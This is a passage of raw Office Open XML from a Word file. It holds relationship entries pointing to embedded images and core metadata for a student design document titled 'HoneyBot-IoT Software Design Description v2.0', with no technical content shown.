Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId9001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId9002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId9003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId9004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId9005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId9006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId9007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId9008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId9009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId9010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId9011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId9012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId9013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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7F2D78A-AFC9-4076-8327-09C93CA08F41}">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121</TotalTime>
  <Pages>57</Pages>
  <Words>9823</Words>
  <Characters>55992</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>466</Lines>
  <Paragraphs>131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65684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HoneyBot-IoT Software Design Description v2.0 (60% Evaluation)</dc:title>
  <dc:subject/>
  <dc:creator>Abdul wadood</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abdul wadood</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-11T17:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-12T09:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>